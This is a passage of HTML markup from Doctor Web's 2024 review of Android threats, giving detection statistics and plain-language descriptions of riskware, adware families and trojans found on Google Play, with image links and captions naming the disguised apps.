        &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (3.25%), and &lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2.99%) were most often detected.
    &lt;/p&gt;
    &lt;p&gt;
        Other common riskware apps were programs modified using the NP Manager utility. This tool embeds a special module into the target software, which allows the digital 
        signature verification process to be bypassed once the apps have been modified. Dr.Web anti-virus detects such programs as different variants of the &lt;b&gt;Tool.NPMod&lt;/b&gt; family. 
        Of these, &lt;b&gt;Tool.NPMod.1&lt;/b&gt; variants were most commonly detected. Over the course of 2024, they significantly strengthened their position, accounting for 16.49% of all riskware 
        detections, up 11.68 pp. from 2023. At the same time, the share of programs modified using the NP Manager tool and detected with another virus record, 
        &lt;b&gt;Tool.NPMod.2&lt;/b&gt;, was 7.92%. As a result, members of this family were responsible for almost a quarter of potentially dangerous software detections.
    &lt;/p&gt;
    &lt;p&gt;
        Programs protected by the &lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; packer were also among the leaders. They were detected in 13.17% of cases, up 12.38 pp. 
        from the year before. Moreover, the number of &lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; detections increased from 3.10% to 3.93%. This is a framework that 
        makes it possible to modify Android apps and run Lua scripts that can potentially be malicious.
    &lt;/p&gt;
    &lt;p&gt;
        At the same time, one 2023 leader, the &lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt; family of utilities, was, on the contrary, less active—down from 14.02% to 8.16%. 
        These tools allow Android programs to be modified and scripts downloaded from the Internet to be added to them. Also less frequently encountered were 
        programs protected by the obfuscating utility &lt;a href="https://vms.drweb.com/search/?q=Tool.Obfuscapk&amp;lng=en"&gt;&lt;b&gt;Tool.Obfuscapk&lt;/b&gt;&lt;/a&gt; (down from 3.22% to 1.05%) and by the packer &lt;a href="https://vms.drweb.com/search/?q=Tool.ApkProtector&amp;lng=en"&gt;&lt;b&gt;Tool.ApkProtector&lt;/b&gt;&lt;/a&gt; 
        (down from 10.14% to 3.39%).
    &lt;/p&gt;
    &lt;p&gt;The ten most widespread riskware apps detected on protected Android devices in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/08_top_riskware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/08_top_riskware_2024_en.png" alt="Most_Common_Riskware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.2&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Riskware platforms that allow applications to launch APK files without installing them. They create a virtual runtime environment in the context of the apps in which they are integrated. The APK files, launched with the help of these platforms, can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modification and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change their logic or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet; these scripts can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software in the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs whose code is encoded and obfuscated by the NP Manager tool.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Adware&lt;/h3&gt;
    &lt;p&gt;
        The most common adware in 2024 was the new &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt; family, which accounted for 47.45% of detections. 
        The previous year’s leaders, members of the &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; family, dropped to second place with a share of 14.76% 
        (a 21.06 pp. decrease in the number of detections). Third place, with a share of 8.68%, was occupied by another new adware family, &lt;b&gt;Adware.Basement&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        Also commonly encountered were families like &lt;a href="https://vms.drweb.com/search/?q=Adware.Airpush&amp;lng=en"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (their share decreased from 8.59% to 4.35%), &lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (down from 4.41% to 3.29%), 
        &lt;a href="https://vms.drweb.com/search/?q=Adware.Leadbolt&amp;lng=en"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (down from 4.37% to 2.26%), and &lt;a href="https://vms.drweb.com/search/?q=Adware.ShareInstall&amp;lng=en"&gt;&lt;b&gt;Adware.ShareInstall&lt;/b&gt;&lt;/a&gt; (down from 5.04% to 1.71%). Unwanted ad-displaying &lt;a href="https://vms.drweb.com/search/?q=Adware.MagicPush&amp;lng=en"&gt;&lt;b&gt;Adware.MagicPush&lt;/b&gt;&lt;/a&gt; 
        programs, which ranked second in 2023, significantly curtailed their activity and did not even make it into the top 10; they moved straight to eleventh place with a share 
        of 1.19% (an 8.39 pp. decrease).
    &lt;/p&gt;
    &lt;p&gt;The ten most widespread adware apps detected on protected Android devices in 2024:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/09_top_adware_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/09_top_adware_2024_en.png" alt="Most_Common_Adware_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger into whose functions specific code has been injected. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) while the messenger is in operation. Such web addresses redirect to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that malicious actors embed into cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Airpush&amp;lng=en"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ShareInstall&amp;lng=en"&gt;&lt;b&gt;Adware.ShareInstall&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that can be built into Android applications. It displays notifications containing ads on the Android OS lock screen.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Youmi&amp;lng=en"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for an unwanted adware module that adds advertising shortcuts onto the Android OS home screen.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Inmobi&amp;lng=en"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some versions of the Inmobi adware SDK. These are capable of making phone calls and adding event entries into an Android device’s calendar.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;
    &lt;p&gt;
        In 2024, Doctor Web’s virus analysts discovered over 200 threats with more than 26.7 million combined downloads. 
        In addition to &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt;, these included many other threats, such as ad-displaying &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 
        trojans. They were distributed under the guise of all kinds of software: image-editing programs, QR code scanners, image collection apps, 
        and even an “anti-theft” alarm for protecting smartphones from falling into the wrong hands. Such trojans conceal their icons after 
        installation and proceed to display aggressive ads that overlap the interface of the operating system and other programs and prevent the 
        device from being used normally.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/10_Android.HiddenAds.4013_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/10_Android.HiddenAds.4013_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/11_Android.HiddenAds.4034_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/11_Android.HiddenAds.4034_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/12_Android.HiddenAds.4025_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/12_Android.HiddenAds.4025_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/13_Android.HiddenAds.656.origin_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/13_Android.HiddenAds.656.origin_2024.png" alt="Android.HiddenAds_2024" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of adware trojans discovered on Google Play in 2024. &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4013&lt;/b&gt; was hiding in the photo editor “Cool Fix Photo Enhancer”, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4034&lt;/b&gt; was in the “Cool Darkness Wallpaper” image-collection app, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4025&lt;/b&gt; was in the QR scanning program “QR Code Assistant”, and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.656.origin&lt;/b&gt; was in the “anti-theft” alarm program “Warning Sound GBD”
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Our experts also discovered various trojans that threat actors were protecting with a complicated software packer.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/14_Android.Packed.57156_2024.0.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/14_Android.Packed.57156_2024.1.png" alt="Android.Packed_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/15_Android.Packed.57159_2024.0.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/15_Android.Packed.57159_2024.1.png" alt="Android.Packed_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The “Lie Detector Fun Prank” program was the &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57156&lt;/b&gt; 
        trojan, and the “Speaker Dust and Water Cleaner” app was the &lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57159&lt;/b&gt; trojan; both were protected with a software packer
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Other malware we found included members of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family, which are used in various fraudulent schemes. The main task of most of 
        these trojans is to open a target URL, while some of them, under certain conditions, can also operate as the software they are disguised as. Many of 
        them were distributed as different apps, including financial programs such as teaching aids and reference books, profit calculators, trading apps, 
        and home bookkeeping tools. Others were disguised as notepads and diaries, software for participating in quiz games, surveys, etc. 
        They also loaded fraudulent investment sites.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/16_Android.FakeApp.1674_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/16_Android.FakeApp.1674_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/17_Android.FakeApp.1708_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/17_Android.FakeApp.1708_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; 
        trojans that opened links to fraudulent websites: &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1681&lt;/b&gt; (disguised as the “SenseStrategy” app), &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1708&lt;/b&gt; 
        (disguised as the “QuntFinanzas” app)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Some &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs were distributed as a variety of games. Many of them could actually provide the declared functionality, 
        but their main task was to load online casino and bookmaker sites.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/18_Android.FakeApp.1622_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/18_Android.FakeApp.1622_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/19_Android.FakeApp.1630_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/19_Android.FakeApp.1630_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans that were disguised as games and loaded bookmaker and online casino websites: 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1622&lt;/b&gt; (“3D Card Merge Game”) and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1630&lt;/b&gt; (“Crazy Lucky Candy”)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Some trojans from this family were once again camouflaged as job-search programs. Such scam apps load fake vacancy listings and offer 
        users the opportunity to create a resume by providing personal information. In other cases, the trojans can ask potential victims to 
        contact “the employer” via a messenger. In reality, they will actually be writing to the scammers, who will try to lure them into one 
        or another fraudulent scheme.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/20_Android.FakeApp.1627_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/20_Android.FakeApp.1627_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/21_Android.FakeApp.1703_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/21_Android.FakeApp.1703_2024.1.png" alt="Android.FakeApp_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans that scammers passed off as job-search apps: &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1627&lt;/b&gt; (the “Aimer” app) and  
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1703&lt;/b&gt; (the “FreeEarn” app)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In addition, more trojans that subscribe users to paid services were uncovered on Google Play. 
        One of them was &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt;, which was being distributed as the “InstaPhoto Editor” photo-editing program.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/22_Android.Subscription.22_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/22_Android.Subscription.22_2024.png" alt="Android.Subscription_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.22&lt;/b&gt; trojan is designed to subscribe users to paid services
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Other such trojans were members of the related &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Harly&amp;lng=en"&gt;&lt;b&gt;Android.Harly&lt;/b&gt;&lt;/a&gt; families, which have a modular architecture. 
        The former can download additional components from the Internet, while the latter are distinguished by the fact that they typically store the modules 
        they need in encrypted form in their file resources.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/23_Android.Joker.2280_2024.png" class="preview"&gt;
                 &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/23_Android.Joker.2280_2024.1.png" alt="Android.Joker_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/24_Android.Harly.82_2024.png" class="preview"&gt;
                 &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/24_Android.Harly.82_2024.1.png" alt="Android.Harly_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;

    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of apps that subscribed victims to paid services: &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2280&lt;/b&gt; 
        was hiding in the horoscope program “My Horoscope”, and &lt;a href="https://vms.drweb.com/search/?q=Android.Harly&amp;lng=en"&gt;&lt;b&gt;Android.Harly&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.87&lt;/b&gt; was hiding in the game “BlockBuster”
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In addition to malware, Doctor Web’s specialists discovered new unwanted software on Google Play, which included different 
        modifications of &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;. 
        These belong to a family of programs that offer users virtual rewards for completing various tasks (often this involves watching ads). 
        The rewards can allegedly be converted into real money or prizes, but to withdraw their “earned” reward, users must collect a certain sum. 
        However, even if they succeed in doing so, they will not get any real payments.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/25_Program.FakeMoney.11_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/25_Program.FakeMoney.11_2024.1.png" alt="Program.FakeMoney_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/26_Program.FakeMoney.14_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/26_Program.FakeMoney.14_2024.1.png" alt="Program.FakeMoney_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        One of the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; 
